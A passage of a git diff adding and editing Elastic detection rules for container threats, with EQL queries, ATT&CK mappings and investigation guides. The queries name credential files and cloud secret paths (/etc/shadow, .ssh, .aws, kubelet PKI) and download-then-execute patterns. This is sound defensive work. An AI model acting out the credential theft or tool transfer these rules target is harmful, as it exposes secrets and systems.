+severity = "medium" +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Credential Access", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( + process.name in ("zip", "tar", "gzip", "hdiutil", "7z", "rar", "7zip", "p7zip") or + ( + /* account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and + process.args in ( + "zip", "/bin/zip", "/usr/bin/zip", "/usr/local/bin/zip", + "tar", "/bin/tar", "/usr/bin/tar", "/usr/local/bin/tar", + "gzip", "/bin/gzip", "/usr/bin/gzip", "/usr/local/bin/gzip", + "hdiutil", "/bin/hdiutil", "/usr/bin/hdiutil", "/usr/local/bin/hdiutil", + "7z", "/bin/7z", "/usr/bin/7z", "/usr/local/bin/7z", + "rar", "/bin/rar", "/usr/bin/rar", "/usr/local/bin/rar", + "7zip", "/bin/7zip", "/usr/bin/7zip", "/usr/local/bin/7zip", + "p7zip", "/bin/p7zip", "/usr/bin/p7zip", "/usr/local/bin/p7zip" + ) and + /* default exclusion list to not FP on default multi-process commands */ + not process.args in ( + "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", + "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man", + "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod", + "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown" + ) + ) +) and +process.args like~ ( + "*/root/.ssh/*", "*/home/*/.ssh/*", "*/root/.bash_history*", "*/etc/hosts*", "*/root/.aws/*", "*/home/*/.aws/*", + "*/root/.docker/*", "*/home/*/.docker/*", "*/etc/group*", "*/etc/passwd*", "*/etc/shadow*", "*/etc/gshadow*", + "*/.azure/*", "*/var/run/secrets/azure/*", "*/.config/gcloud/*", "*application_default_credentials.json*", + "*type: service_account*", "*client_email*", "*private_key_id*", "*private_key*", "*/var/run/secrets/google/*", + "*GOOGLE_APPLICATION_CREDENTIALS*", "*AZURE_CLIENT_ID*", "*AZURE_TENANT_ID*", "*AZURE_CLIENT_SECRET*", + "*AZURE_FEDERATED_TOKEN_FILE*", "*IDENTITY_ENDPOINT*", "*IDENTITY_HEADER*", "*MSI_ENDPOINT*", "*MSI_SECRET*" +) and process.interactive == true and container.id like "*" +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1560" +name = "Archive Collected Data" +reference = "https://attack.mitre.org/techniques/T1560/" + +[[rule.threat.technique.subtechnique]] +id = "T1560.001" +name = "Archive via Utility" +reference = "https://attack.mitre.org/techniques/T1560/001/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml b/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml index 1a58af92a38..6466f00e4a8 100644 --- a/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml +++ b/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/01/15" [rule] author = ["Elastic"] @@ -60,7 +60,14 @@ references = ["https://sysdig.com/blog/cve-2021-25741-kubelet-falco/"] risk_score = 47 rule_id = "9661ed8b-001c-40dc-a777-0983b7b0c91a" severity = "medium" -tags = ["Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -112,16 +119,3 @@ reference = "https://attack.mitre.org/techniques/T1552/001/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml b/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml index 005de67e7ad..1dc98471512 100644 --- a/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml +++ b/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/06" [rule] author = ["Elastic"] @@ -101,11 +101,6 @@ any where host.os.type == "linux" and process.interactive == true and container. [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" diff --git a/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml b/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml index 3b5a90b50ca..a3e3f977696 100644 --- a/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml +++ b/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/03/05" [rule] author = ["Elastic"] @@ -130,35 +130,45 @@ sequence by process.parent.entity_id, container.id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" + [rule.threat.tactic] + name = "Defense Evasion" + id = "TA0005" + reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] + name = "Obfuscated Files or Information" + id = "T1027" + reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat.technique]] + name = "Deobfuscate/Decode Files or Information" + id = "T1140" + reference = "https://attack.mitre.org/techniques/T1140/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + id = "T1059" + name = "Command and Scripting Interpreter" + reference = "https://attack.mitre.org/techniques/T1059/" + + [[rule.threat.technique.subtechnique]] + name = "Unix Shell" + id = "T1059.004" + reference = "https://attack.mitre.org/techniques/T1059/004/" + + [[rule.threat.technique]] + name = "User Execution" + id = "T1204" + reference = "https://attack.mitre.org/techniques/T1204/" + + [[rule.threat.technique.subtechnique]] + name = "Malicious File" + id = "T1204.002" + reference = "https://attack.mitre.org/techniques/T1204/002/" diff --git a/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml b/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml new file mode 100644 index 00000000000..5da9a158df8 --- /dev/null +++ b/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml @@ -0,0 +1,152 @@ +[metadata] +creation_date = "2026/03/05" +integration = ["cloud_defend"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/03/05" + +[rule] +author = ["Elastic"] +description = """ +This rule detects the creation, execution, and deletion of files inside a container, a common +technique used by attackers to evade detection. +""" +from = "now-6m" +index = ["logs-cloud_defend.process*", "logs-cloud_defend.file*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Ingress Tool Transfer Followed by Execution and Deletion Detected via Defend for Containers" +note = """## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Ingress Tool Transfer Followed by Execution and Deletion Detected via Defend for Containers + +This detection flags a rapid sequence inside a container where a file is written to a common transient or user-writable location, executed, then deleted shortly after—an evasion pattern meant to minimize on-disk artifacts and frustrate forensic review. Attackers often use a shell to pull a payload with common transfer utilities into `/tmp` or shared memory, run it immediately for credential theft or lateral movement, and then remove it to blend back into normal container churn. + +### Possible investigation steps + +- Pivot on the container to review the full process tree and preceding commands around the sequence to determine how the payload was introduced (interactive shell, entrypoint, cron, CI job, or exploited service) and what else executed nearby in time. +- Retrieve the file content if still present or recover it from container runtime logs/snapshots/registry layers, then compute hashes and run static/dynamic analysis to identify malware family, network indicators, and persistence or credential-access behavior. +- Review outbound network connections from the container during the same window to identify download sources, callback infrastructure, and any subsequent lateral movement attempts to internal services. +- Check whether the container or pod is running with elevated privileges (host mounts, privileged mode, sensitive service account tokens, or access to Docker/CRI sockets) to assess host-escape risk and scope potential impact beyond the container. +- Validate legitimacy by correlating with recent deploys/build steps and expected package/install activity, and if suspicious, isolate the workload and rotate any exposed secrets or tokens used by the container. + +### False positive analysis + +- A container entrypoint or bootstrap script downloads a small helper or configuration artifact into `/tmp` (or similar), executes it via a shell to perform initialization checks or configuration, and then deletes it immediately to keep the runtime filesystem clean. +- A build/test step running inside a container fetches transient binaries or linkable objects (e.g., via `curl`/`wget`/`scp` or `ld`) into writable paths like `/tmp` or `/opt`, executes them as part of compilation or validation, and removes them as part of routine cleanup. + +### Response and remediation + +- Quarantine the affected pod or container by isolating it from the network and scaling it to zero or killing the container while preserving a copy of the writable layer and runtime logs for forensic analysis. +- Identify and block the download and command-and-control endpoints used by the transfer utility (for example the `curl`/`wget` URL or `scp` destination) at egress controls, then search for the same indicator across other workloads and nodes to find additional compromised containers. +- Eradicate by rebuilding and redeploying the workload from a known-good image and clean source, removing any unauthorized startup scripts or injected binaries in paths like `/tmp`, `/dev/shm`, `/var/tmp`, `/root`, or `/opt`. +- Rotate and revoke any credentials the container could access such as Kubernetes service account tokens, API keys, registry credentials, and mounted secrets, and invalidate sessions if the executed payload could have harvested them. +- Escalate to incident response immediately if the workload was privileged, had hostPath mounts or container runtime socket access, touched `/proc/*/fd/*`, or showed signs of data access or lateral movement to internal services. +- Harden by enforcing least privilege and runtime controls such as read-only root filesystems, no shell or download tools in production images, restricted egress allowlists, and admission policies that block privileged pods and sensitive host mounts. +""" +references = [ + "https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware", +] +risk_score = 73 +rule_id = "1dc56174-5d02-4ca4-af92-e391f096fb21" +severity = "high" +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +sequence by container.id, user.id with maxspan=10s + [file where event.action == "creation" and ( + process.name in ("curl", "wget", "fetch", "ftp", "sftp", "scp", "rsync", "ld") or + ( + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and + process.args in ( + "curl", "/bin/curl", "/usr/bin/curl", "/usr/local/bin/curl", + "wget", "/bin/wget", "/usr/bin/wget", "/usr/local/bin/wget", + "fetch", "/bin/fetch", "/usr/bin/fetch", "/usr/local/bin/fetch", + "ftp", "/bin/ftp", "/usr/bin/ftp", "/usr/local/bin/ftp", + "sftp", "/bin/sftp", "/usr/bin/sftp", "/usr/local/bin/sftp", + "scp", "/bin/scp", "/usr/bin/scp", "/usr/local/bin/scp", + "rsync", "/bin/rsync", "/usr/bin/rsync", "/usr/local/bin/rsync", + "ld", "/bin/ld", "/usr/bin/ld", "/usr/local/bin/ld" + ) and + /* default exclusion list to not FP on default multi-process commands */ + not process.args in ( + "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", + "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man", + "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod", + "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown" + ) + ) + ) and file.path like ( + "/dev/shm/*", "/run/shm/*", "/tmp/*", "/var/tmp/*", "/run/*", "/var/run/*", "/var/www/*", + "/proc/*/fd/*", "/home/*/*", "/root/*", "/opt/*" + ) + ] by file.name + [process where event.type == "start" and event.action == "exec" and + process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") + ] by process.name + [file where event.action == "deletion" and file.path like ( + "/dev/shm/*", "/run/shm/*", "/tmp/*", "/var/tmp/*", "/run/*", "/var/run/*", "/var/www/*", + "/proc/*/fd/*", "/home/*/*", "/root/*", "/opt/*" + ) and not process.name in ("rm", "ld", "conftest", "link", "gcc", "getarch", "ld") + ] by file.name +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" + +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml b/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml index 8ac47055373..0538c4cd9c4 100644 --- a/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml +++ b/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/10" [rule] author = ["Elastic"] @@ -75,30 +75,43 @@ process where event.type == "start" and event.action == "exec" and process.inter [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" - -[[rule.threat.technique.subtechnique]] -id = "T1564.001" -name = "Hidden Files and Directories" -reference = "https://attack.mitre.org/techniques/T1564/001/" - [rule.threat.tactic] -id = "TA0005" name = "Defense Evasion" +id = "TA0005" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +name = "Reflective Code Loading" +id = "T1620" +reference = "https://attack.mitre.org/techniques/T1620/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1609" -name = "Container Administration Command" -reference = "https://attack.mitre.org/techniques/T1609/" - [rule.threat.tactic] -id = "TA0002" name = "Execution" +id = "TA0002" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +name = "Command and Control" +id = "TA0011" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat.technique]] +name = "Application Layer Protocol" +id = "T1071" +reference = "https://attack.mitre.org/techniques/T1071/" diff --git a/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml b/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml index 3de8c254263..f84f1a58ad4 100644 --- a/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml +++ b/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/01/15" [rule] author = ["Elastic"] @@ -66,7 +66,14 @@ references = [ risk_score = 73 rule_id = "342f834b-21a6-41bf-878c-87d116eba3ee" severity = "high" -tags = ["Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -92,21 +99,3 @@ reference = "https://attack.mitre.org/techniques/T1574/006/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[[rule.threat.technique.subtechnique]] -id = "T1574.006" -name = "Dynamic Linker Hijacking" -reference = "https://attack.mitre.org/techniques/T1574/006/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml b/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml index 0632be00b6b..4168f4a7137 100644 --- a/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml +++ b/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/03/05" [rule] author = ["Elastic"] @@ -54,7 +54,15 @@ references = [ risk_score = 47 rule_id = "227cf26a-88d1-4bcb-bf4c-925e5875abcf" severity = "medium" -tags = ["Tactic: Defense Evasion", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -74,6 +82,11 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" @@ -83,3 +96,31 @@ reference = "https://attack.mitre.org/techniques/T1140/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/discovery_dns_enumeration.toml b/rules/integrations/cloud_defend/discovery_dns_enumeration.toml index 051c350fe9d..f09bad36a77 100644 --- a/rules/integrations/cloud_defend/discovery_dns_enumeration.toml +++ b/rules/integrations/cloud_defend/discovery_dns_enumeration.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/01/27" [rule] author = ["Elastic"] @@ -119,6 +119,16 @@ id = "T1613" name = "Container and Resource Discovery" reference = "https://attack.mitre.org/techniques/T1613/" +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + +[[rule.threat.technique]] +id = "T1049" +name = "System Network Connections Discovery" +reference = "https://attack.mitre.org/techniques/T1049/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/integrations/cloud_defend/discovery_environment_enumeration.toml b/rules/integrations/cloud_defend/discovery_environment_enumeration.toml index ebc953d4633..f5cef44a7f2 100644 --- a/rules/integrations/cloud_defend/discovery_environment_enumeration.toml +++ b/rules/integrations/cloud_defend/discovery_environment_enumeration.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/01/27" [rule] author = ["Elastic"] @@ -96,6 +96,11 @@ process.interactive == true and container.id like "*" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + [[rule.threat.technique]] id = "T1082" name = "System Information Discovery" diff --git a/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml b/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml new file mode 100644 index 00000000000..9a67f6171d9 --- /dev/null +++ b/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml @@ -0,0 +1,103 @@ +[metadata] +creation_date = "2026/02/02" +integration = ["cloud_defend"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/02/09" + +[rule] +author = ["Elastic"] +description = """ +This rule detects the access of the Kubelet certificate file inside a container. The Kubelet certificate file is +used to authenticate the container to the Kubernetes API server, and may be used by an adversary to gain access +to the Kubernetes API server or other resources within the cluster. These files are a common target for adversaries +to gain access to the cluster. There is a current limitation in the defend for containers file sensor that prevents +file open events from being logged for file open events without write intent. +""" +from = "now-6m" +index = ["logs-cloud_defend.file*", "logs-cloud_defend.process*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Kubelet Certificate File Access Detected via Defend for Containers" +note = """ ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Kubelet Certificate File Access Detected via Defend for Containers + +This detection flags an interactive process inside a Linux container opening files under `/var/lib/kubelet/pki/`, which includes the kubelet client certificate and key used to authenticate to the Kubernetes API. Attackers who obtain these credentials can impersonate the node, enumerate cluster resources, and pivot to secrets or workloads. A common pattern is an operator exec’ing into a compromised pod, locating the kubelet cert/key pair, copying it out, then using it to query the API server from outside the container. + +### Possible investigation steps + +- Identify the pod/namespace/node and owning controller for the container, then confirm whether it should ever have access to host kubelet PKI (e.g., privileged DaemonSet, hostPath mount, node-agent tooling) or if this is an unexpected breakout indicator. +- Review the interactive session context (exec/attach/ssh), including who initiated it and the command history/TTY telemetry around the alert time, to determine whether this was routine debugging or suspicious enumeration. +- Inspect the container filesystem and recent file operations for evidence of credential harvesting (reads of kubelet client cert/key pairs, copies to temporary paths, archive creation, or outbound transfer tooling) and preserve artifacts for forensics. +- Correlate immediately after the access event for Kubernetes API activity using node credentials (unusual discovery, secret access, or cluster-wide queries) originating from the same workload identity, node, or egress address. +- Validate whether kubelet credentials were reused by reviewing API server audit logs for unexpected node identity actions, and rotate kubelet client certs/keys and isolate the workload if misuse is suspected. + +### False positive analysis + +- A cluster operator or SRE may exec into a privileged pod (e.g., a DaemonSet with hostPath access to `/var/lib/kubelet`) for node troubleshooting and use interactive shell commands to inspect or validate kubelet PKI files during incident response or routine maintenance. +- A legitimate containerized node-management or diagnostic workflow that runs interactively (e.g., invoked manually for verification) may open files under `/var/lib/kubelet/pki/` as part of validating kubelet certificate presence/permissions after upgrades, certificate rotation, or node reconfiguration. + +### Response and remediation + +- Immediately isolate the affected workload by scaling the pod/controller to zero or cordoning and draining the node if a privileged pod has host access to `/var/lib/kubelet/pki/`, and preserve the container filesystem and process list for forensics before teardown. +- Remove the execution path that enabled access by deleting or patching the pod/DaemonSet to drop `privileged`, `hostPID/hostNetwork`, and any `hostPath` mounts that expose `/var/lib/kubelet` and redeploy only from a known-good image and manifest. +- Rotate and reissue kubelet client certificates/keys on the impacted node(s) (or replace the node from autoscaling/immutable infrastructure) and verify the old credentials can no longer authenticate to the Kubernetes API server. +- Review Kubernetes API server audit logs for activity using the node identity around the access time (cluster-wide discovery, secret reads, token reviews, exec into other pods) and revoke/rotate any exposed service account tokens or secrets accessed during the window. +- Escalate to the Kubernetes platform/on-call security team immediately if the files include a kubelet client key, if the pod was privileged or had host mounts, or if API audit logs show node credential use from unexpected sources or unusual resource enumeration. +- Harden the cluster by enforcing policies that block hostPath access to `/var/lib/kubelet` and privileged pods (Pod Security Admission/Gatekeeper/Kyverno), limiting interactive exec/attach via RBAC, and monitoring for subsequent access attempts to kubelet PKI paths and related credential exfiltration tooling. +""" +references = [ + "https://heilancoos.github.io/research/2025/12/16/kubernetes.html#kubelet-api", + "https://www.cyberark.com/resources/threat-research-blog/using-kubelet-client-to-attack-the-kubernetes-cluster", + "https://www.aquasec.com/blog/kubernetes-exposed-exploiting-the-kubelet-api/" +] +risk_score = 21 +rule_id = "42de0740-8ed8-4b8b-995c-635b56a8bbf4" +severity = "low" +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +any where host.os.type == "linux" and process.interactive == true and container.id like "*" and ( + (event.category == "file" and event.type == "change" and event.action == "open" and file.path like "/var/lib/kubelet/pki/*") or + (event.category == "process" and event.type == "start" and event.action == "exec" and + ( + process.name in ("cat", "head", "tail", "more", "less", "sed", "awk") or + process.args in ( + "cat", "/bin/cat", "/usr/bin/cat", "/usr/local/bin/cat", + "head", "/bin/head", "/usr/bin/head", "/usr/local/bin/head", + "tail", "/bin/tail", "/usr/bin/tail", "/usr/local/bin/tail", + "more", "/bin/more", "/usr/bin/more", "/usr/local/bin/more", + "less", "/bin/less", "/usr/bin/less", "/usr/local/bin/less", + "sed", "/bin/sed", "/usr/bin/sed", "/usr/local/bin/sed", + "awk", "/bin/awk", "/usr/bin/awk", "/usr/local/bin/awk" + ) + ) and process.args like "*/var/lib/kubelet/pki/*") +) +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml b/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml index 8a09a1d7924..81381ad389b 100644 --- a/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml +++ b/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml @@ -4,7 +4,7 @@ integration = 